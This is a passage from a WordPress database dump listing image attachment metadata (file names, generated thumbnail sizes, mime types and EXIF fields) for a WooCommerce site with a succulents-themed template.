eg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"blog-img-16-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"blog-img-16-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"blog-img-16-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:23:\"blog-img-16-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:23:\"blog-img-16-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:23:\"blog-img-16-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:24:\"blog-img-16-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:23:\"blog-img-16-550x733.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:733;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:23:\"blog-img-16-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"blog-img-16-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"blog-img-16-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1492,2473,'_wp_attached_file','2018/01/product-9.jpg'),(1493,2473,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:21:\"2018/01/product-9.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"product-9-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"product-9-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"product-9-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"product-9-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"product-9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"product-9-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"product-9-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"product-9-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"product-9-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"product-9-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"product-9-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"product-9-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"product-9-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"product-9-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1494,3935,'_wp_attachment_image_alt','a'),(1495,4261,'_wp_attachment_image_alt','a'),(1496,3936,'_wp_attached_file','2018/01/blog-recipe-5.jpg'),(1497,3936,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:420;s:6:\"height\";i:514;s:4:\"file\";s:25:\"2018/01/blog-recipe-5.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"blog-recipe-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"blog-recipe-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"blog-recipe-5-245x300.jpg\";s:5:\"width\";i:245;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"blog-recipe-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:25:\"blog-recipe-5-420x300.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:25:\"blog-recipe-5-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:25:\"blog-recipe-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"blog-recipe-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1498,4262,'_wp_attached_file','2018/01/blog-recipe-5-1.jpg'),(1499,4262,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:420;s:6:\"height\";i:514;s:4:\"file\";s:27:\"2018/01/blog-recipe-5-1.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"blog-recipe-5-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"blog-recipe-5-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"blog-recipe-5-1-245x300.jpg\";s:5:\"width\";i:245;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"blog-recipe-5-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:27:\"blog-recipe-5-1-420x300.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:27:\"blog-recipe-5-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:27:\"blog-recipe-5-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"blog-recipe-5-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1500,398,'_wp_attachment_image_alt','a'),(1501,3936,'_wp_attachment_image_alt','a'),(1502,404,'_wp_attached_file','2018/01/h2-img-11.png'),(1503,4262,'_wp_attachment_image_alt','a'),(1504,404,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:538;s:6:\"height\";i:348;s:4:\"file\";s:21:\"2018/01/h2-img-11.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h2-img-11-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h2-img-11-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h2-img-11-300x194.png\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h2-img-11-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"h2-img-11-538x300.png\";s:5:\"width\";i:538;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"h2-img-11-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"h2-img-11-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h2-img-11-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1505,3937,'_wp_attached_file','2018/01/blog-recipe-6.jpg'),(1506,3937,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:420;s:6:\"height\";i:513;s:4:\"file\";s:25:\"2018/01/blog-recipe-6.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"blog-recipe-6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"blog-recipe-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"blog-recipe-6-246x300.jpg\";s:5:\"width\";i:246;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"blog-recipe-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:25:\"blog-recipe-6-420x300.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:25:\"blog-recipe-6-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:25:\"blog-recipe-6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"blog-recipe-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1507,4263,'_wp_attached_file','2018/01/blog-recipe-6-1.jpg'),(1508,4263,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:420;s:6:\"height\";i:513;s:4:\"file\";s:27:\"2018/01/blog-recipe-6-1.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"blog-recipe-6-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"blog-recipe-6-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"blog-recipe-6-1-246x300.jpg\";s:5:\"width\";i:246;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"blog-recipe-6-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:27:\"blog-recipe-6-1-420x300.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:27:\"blog-recipe-6-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:27:\"blog-recipe-6-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"blog-recipe-6-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1509,1808,'_wp_attachment_image_alt','a'),(1510,1809,'_wp_attached_file','2018/02/portfolio-img-7.jpg'),(1511,1809,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:27:\"2018/02/portfolio-img-7.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"portfolio-img-7-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"portfolio-img-7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"portfolio-img-7-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"portfolio-img-7-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"portfolio-img-7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"portfolio-img-7-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:27:\"portfolio-img-7-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:27:\"portfolio-img-7-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:27:\"portfolio-img-7-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:27:\"portfolio-img-7-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:27:\"portfolio-img-7-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:27:\"portfolio-img-7-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"portfolio-img-7-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"portfolio-img-7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1512,3937,'_wp_attachment_image_alt','a'),(1513,4263,'_wp_attachment_image_alt','a'),(1514,1020,'_wp_attachment_image_alt','a'),(1515,2473,'_wp_attachment_image_alt','a'),(1516,404,'_wp_attachment_image_alt','a'),(1517,3941,'_wp_attached_file','2018/01/fish-1300x1943-1.jpg'),(1518,3941,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:1943;s:4:\"file\";s:28:\"2018/01/fish-1300x1943-1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"fish-1300x1943-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"fish-1300x1943-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"fish-1300x1943-1-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"fish-1300x1943-1-201x300.jpg\";s:5:\"width\";i:201;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"fish-1300x1943-1-685x1024.jpg\";s:5:\"width\";i:685;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"fish-1300x1943-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"fish-1300x1943-1-768x1148.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1148;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"fish-1300x1943-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:28:\"fish-1300x1943-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:30:\"fish-1300x1943-1-1028x1536.jpg\";s:5:\"width\";i:1028;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:28:\"fish-1300x1943-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"fish-1300x1943-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"fish-1300x1943-1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:30:\"fish-1300x1943-1-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"fish-1300x1943-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"fish-1300x1943-1-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"fish-1300x1943-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1540365787\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1519,4264,'_wp_attached_file','2018/01/recipe-img-2-1.jpg'),(1520,4264,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:1943;s:4:\"file\";s:26:\"2018/01/recipe-img-2-1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"recipe-img-2-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"recipe-img-2-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"recipe-img-2-1-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"recipe-img-2-1-201x300.jpg\";s:5:\"width\";i:201;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"recipe-img-2-1-685x1024.jpg\";s:5:\"width\";i:685;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"recipe-img-2-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"recipe-img-2-1-768x1148.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1148;s:9:\"mim